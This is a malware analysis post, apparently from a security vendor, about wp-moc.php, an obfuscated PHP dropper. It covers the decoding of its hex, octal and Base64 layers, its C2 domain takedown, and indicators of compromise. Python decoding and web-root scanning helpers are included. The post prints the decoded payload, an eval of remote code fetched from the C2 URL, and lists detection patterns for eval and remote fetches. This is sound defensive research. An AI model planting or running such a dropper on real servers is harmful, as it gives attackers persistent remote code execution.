FEBRUARY 16, 2026

A New Silent Dropper: wp-moc.php

This PHP snippet is a lightweight downloader/executor (often called a "dropper"). It uses multi-layered encoding (Hex, Octal, and Base64) to hide its true intent: fetching and executing remote code from a Command and Control (C2) server. By suppressing error reporting, it ensures that even if the remote server is down, the compromised web server won't throw a visible error that might alert an administrator.

Deconstructing the file

Step 1: Evasion and Silence

The code begins with a common evasion tactic:

error_reporting(E_ALL^E_NOTICE^E_WARNING);

This tells PHP to ignore notices and warnings. If the script fails to reach its home server, it won't log an "Insecure Connection" or "File Not Found" warning, helping it stay "under the radar" in system logs.

Step 2: Layered Obfuscation

The variable $a contains a long string of mixed Hex (\x50) and Octal (\104) characters. When these are converted to plain text, they reveal a Base64 encoded string.

The obfuscation chain looks like this:

  1. Hex/Octal String → Decodes to → Base64 String
  2. Base64 String → Decodes to → Active PHP Payload

Step 3: The De-obfuscated Payload

Once we decode the Base64 string inside $a, the true malicious intent is revealed:

<?=eval("?>".file_get_contents("https://jwblog[.]vjkcity[.]com/1202.txt")); __halt_compiler();?>

What this payload does:

  • file_get_contents: It reaches out to an external URL (jwblog[.]vjkcity[.]com/1202.txt).
  • eval("?>". ...): It takes whatever text is inside that .txt file and executes it as PHP code immediately. This allows the attacker to change the malware (e.g., swapping a credit card scraper for a ransomware locker) without ever touching the compromised server again.
  • __halt_compiler(): This is often used to prevent any trailing junk data in the file from being parsed, ensuring the script exits cleanly.
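To make the two decoding layers described above concrete, here is an added Python decoder. It is not code from the original post or from Monarx: it resolves PHP double-quoted \xNN (hex) and \NNN (octal) escapes, Base64-decodes the result, and pulls out the URLs and watched function calls an analyst wants from the plaintext. The sample literal is constructed from a payload of the same shape as the one above, with the placeholder host example.invalid in place of the real C2; the function names and regexes are my own.

```python
import base64
import re

# Constructed sample, not the real wp-moc.php: the decoded payload has the shape
# the post documents, but the C2 URL is replaced with a placeholder.
SAMPLE_PAYLOAD = (
    '<?=eval("?>".file_get_contents("https://example.invalid/payload.txt")); '
    '__halt_compiler();?>'
)


def php_escape_mixed(data: bytes) -> str:
    """Build a PHP double-quoted literal mixing \\xNN (hex) and \\NNN (octal)
    escapes, the way the dropper hides its Base64 blob. Used only to construct
    the sample below."""
    return "".join(
        f"\\x{b:02x}" if i % 2 == 0 else f"\\{b:o}" for i, b in enumerate(data)
    )


# What the $a literal in the dropper looks like (constructed from SAMPLE_PAYLOAD).
SAMPLE_LITERAL = php_escape_mixed(base64.b64encode(SAMPLE_PAYLOAD.encode()))

# PHP double-quoted escapes: \x plus 1-2 hex digits, or 1-3 octal digits.
ESCAPE_RE = re.compile(r"\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})")


def unescape_php_literal(literal: str) -> bytes:
    """Layer 1: resolve the hex/octal escapes into raw bytes."""
    out = bytearray()
    pos = 0
    for m in ESCAPE_RE.finditer(literal):
        out += literal[pos:m.start()].encode("latin-1")
        if m.group(1) is not None:
            out.append(int(m.group(1), 16))
        else:
            out.append(int(m.group(2), 8) & 0xFF)  # PHP wraps octal values > 0o377
        pos = m.end()
    out += literal[pos:].encode("latin-1")
    return bytes(out)


def deobfuscate(literal: str) -> str:
    """Layer 2: the unescaped bytes are a Base64 string; decode it to the payload."""
    layer1 = unescape_php_literal(literal)
    return base64.b64decode(layer1, validate=True).decode("utf-8", errors="replace")


# Calls whose presence in a decoded blob warrants a closer look.
WATCHED_CALLS = ("eval(", "file_get_contents(", "__halt_compiler(",
                 "base64_decode(", "system(", "shell_exec(", "curl_exec(")
URL_RE = re.compile(r"https?://[^\s\"'<>)]+")


def triage(literal: str) -> dict:
    """Decode an obfuscated literal and report the plaintext payload, any URLs
    (remote payload locations) and the watched calls it uses."""
    payload = deobfuscate(literal)
    return {
        "payload": payload,
        "urls": URL_RE.findall(payload),
        "calls": [c for c in WATCHED_CALLS if c in payload],
    }


if __name__ == "__main__":
    result = triage(SAMPLE_LITERAL)
    print(result["payload"])
    print("URLs:", result["urls"])
    print("Calls:", result["calls"])
```

Running the block prints the decoded placeholder payload, its single URL and the three calls (eval, file_get_contents, __halt_compiler). Paste the real $a literal from a quarantined copy of the file into triage() to recover its URL without ever executing the PHP.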

Stopping the spread

At Monarx, besides identifying and remediating malware, we work towards the common good and, when possible, file requests with registrars, hosting providers and transit providers such as Cloudflare so that malicious domains serving malware can be taken offline.

During the investigation we found the following variations:

jwblog[.]vjkcity[.]com/1202.txt
jwblog[.]vjkcity[.]com/1121.txt
jwblog[.]vjkcity[.]com/wp-toc.txt

Checking the hosting

A simple DNS query revealed this website was loading from Cloudflare:

jwblog.vjkcity.com. 122 IN A 172.67.158.51
jwblog.vjkcity.com. 122 IN A 104.21.90.166

And they had even set up some protection: a simple cURL request from our sandbox received an HTTP 403 Forbidden response:

HTTP/1.1 403 Forbidden
Date: Tue, 10 Feb 2026 00:15:19 GMT
Content-Type: text/html
Connection: keep-alive
Nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}
Server: cloudflare
X-Powered-By: ASP.NET
cf-cache-status: DYNAMIC
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=nM2%2FTkgMMscDk1ZR08MaStaqBOmMycNL2QI1emhW6JCsDiBErCtFUys8nwBvXEEgaGdoKURPIwl6NAPeJwxgR1kfxiIxUglGbNXFfaaix4y9Qw%3D%3D"}]}
CF-RAY: 9cb769531e8093d5-DFW
alt-svc: h3=":443"; ma=86400
We proceeded to file an abuse claim for malware distribution with Cloudflare and provided all the details so they could review it.

Escalating to the Registrar

The next step was to find out who the registrar for the domain was. The WHOIS record for the domain showed the registrar to be openprovider.com:

  Domain Name: VJKCITY.COM
  Registry Domain ID: 2105659736_DOMAIN_COM-VRSN
  Registrar WHOIS Server: whois.registrar.eu
  Registrar URL: http://www.openprovider.com
  Updated Date: 2025-12-18T06:54:46Z
  Creation Date: 2017-03-17T06:58:55Z
  Registry Expiry Date: 2027-03-17T06:58:55Z
  Registrar: Hosting Concepts B.V. d/b/a Registrar.eu
  Registrar IANA ID: 1647
  Registrar Abuse Contact Email: abuse@registrar.eu
  Registrar Abuse Contact Phone: +31.104482297
  Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
  Name Server: NAYA.NS.CLOUDFLARE.COM
  Name Server: NIKON.NS.CLOUDFLARE.COM

We followed their guidelines for reporting malware and provided all the necessary information; they parked the domain and forwarded the complaint against the domain owner. A few hours later we received confirmation that the malicious content had been removed.

The site was confirmed to be offline and no longer distributing malware, which effectively halted the further spread of the infection 🎉.

Indicators of Compromise (IoCs)

Professionals should look for the following markers in web logs and file integrity monitoring systems:

Network Indicators

  • Domain: jwblog[.]vjkcity[.]com (C2 Distribution Server)
  • URLs: 
    1. jwblog[.]vjkcity[.]com/1202.txt (Remote Payload Location #1)
    2. jwblog[.]vjkcity[.]com/1121.txt (Remote Payload Location #2)
    3. jwblog[.]vjkcity[.]com/wp-toc.txt (Remote Payload Location #3)
  • IPs uploading this malware:
    1. 140[.]83[.]84[.]85
    2. 79[.]127[.]200[.]148

File paths & SHA256 Signatures

  • File path: /wp-moc.php
  • SHA256 Signatures of the variations observed:
    • d9abdc7e6eaaee5bead9c4638555681e4168d337687f3b97f9e5b1df06500d2
    • 8d73e1ee08b734bced26ca7ef799314f369026df5a32bd1236f3763f0e3c9372
    • 2cf0a9772c5f05a9e43758ff6e354d26e78e89ba8b7d1dd34506680284f9f546
Note: The specific IP addresses & domains provided above are the ones observed during the investigation. Specific, actionable IPs & domains should be validated with your threat intelligence feeds.
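As an added example (not from the post or from Monarx), here is a small Python triage helper that turns the indicators above into a scan of a web root. It flags a .php file by known SHA-256 hash, by the wp-moc.php filename, and by the structural traits the analysis describes: error suppression via error_reporting(E_ALL^...), a long run of hex/octal escapes, and eval or a file_get_contents of a remote URL. The sample files and the KNOWN_HASHES placeholder are constructed so the block runs offline; replace the placeholder with the hashes from the IoC list in a real deployment.

```python
import hashlib
import re
from pathlib import Path

# Placeholder hash set (constructed). In practice, load the SHA-256 values
# from the IoC list above into this set.
KNOWN_HASHES = {"0" * 64}

# Heuristics drawn from the post's description of wp-moc.php.
ESCAPE_RUN_RE = re.compile(r"(?:\\x[0-9A-Fa-f]{2}|\\[0-7]{1,3}){40,}")  # long hex/octal run
SUPPRESS_RE = re.compile(r"error_reporting\s*\(\s*E_ALL\s*\^")           # notices/warnings masked
EXEC_RE = re.compile(r"\beval\s*\(|file_get_contents\s*\(\s*[\"']https?://")  # eval / remote fetch


def sha256_of(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def classify(name: str, source: bytes, known_hashes=KNOWN_HASHES) -> list:
    """Return the reasons a PHP file is suspicious; an empty list means no hit."""
    reasons = []
    if sha256_of(source) in known_hashes:
        reasons.append("known-hash")
    if name == "wp-moc.php":
        reasons.append("dropper-filename")
    text = source.decode("utf-8", errors="replace")
    if ESCAPE_RUN_RE.search(text):
        reasons.append("long-escape-run")
    if SUPPRESS_RE.search(text):
        reasons.append("error-suppression")
    if EXEC_RE.search(text):
        reasons.append("eval-or-remote-fetch")
    return reasons


def scan_webroot(root, known_hashes=KNOWN_HASHES) -> dict:
    """Walk a web root and report every .php file that has at least one reason."""
    findings = {}
    for path in Path(root).rglob("*.php"):
        reasons = classify(path.name, path.read_bytes(), known_hashes)
        if reasons:
            findings[str(path)] = reasons
    return findings


# Constructed samples for the stand-alone run (not real malware): a file with
# the dropper's traits but an inert escape blob, and a plain template.
SUSPICIOUS_SAMPLE = (
    "<?php error_reporting(E_ALL^E_NOTICE^E_WARNING);\n"
    '$a="'
    + "".join(f"\\x{b:02x}" if i % 2 else f"\\{b:o}" for i, b in enumerate(b"Q" * 60))
    + '";\n?>'
).encode()
BENIGN_SAMPLE = b"<?php\n// plain template\necho 'hello';\n"


if __name__ == "__main__":
    print("wp-moc.php:", classify("wp-moc.php", SUSPICIOUS_SAMPLE))
    print("index.php:", classify("index.php", BENIGN_SAMPLE))
    # Against a live tree: print(scan_webroot("/var/www/html", KNOWN_HASHES))
```

The hash check catches the exact variants already seen; the three structural checks are there for the next variant with a fresh hash, which is why the post's own sample would also trip "long-escape-run" and "error-suppression" even if its digest were unknown. Treat hits as triage leads to decode with the analysis above, not as automatic deletions.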